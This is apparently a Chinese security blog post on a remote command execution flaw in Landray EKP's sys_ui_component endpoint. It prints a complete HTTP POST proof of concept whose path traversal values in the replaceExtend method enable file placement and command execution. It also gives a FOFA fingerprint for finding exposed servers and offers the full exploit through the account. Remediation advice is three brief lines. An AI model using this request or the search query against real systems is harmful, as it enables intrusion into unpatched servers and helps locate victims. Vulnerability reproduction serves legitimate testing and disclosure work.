2024HW 蓝凌 ekp sys_ui_component 远程命令执行漏洞复现

文摘   科技   2024-08-01 16:57   陕西  

免责声明

     请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。



01
0x01漏洞描述
      蓝凌 EKP sys_ui_component 远程命令执行漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁。

02
0x02 漏洞复现 
POC如下所示:
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1Host:xx.xx.xx.xxAccept:application/json,text/javascript,*/*;q=0.01Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Connection:closeContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequestContent-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51--
exp
后台回复:"蓝凌exp" 获取

03
0x03 复现过程

fofa:icon_hash="831854882"

页面是这个样子的:

使用poc:

执行命令dir:

04
0x04 修复建议


1、请联系厂商进行修复。2、如非必要,禁止公网访问该系统。3、设置白名单访问。

END
点击蓝字  关注我们

爱喝酒烫头的曹操
主要分享一些漏洞挖掘小技巧,代码审计、web安全、内网渗透以及一些实战案例、快速获得edu及cnvd漏洞报送证书小技巧。
 最新文章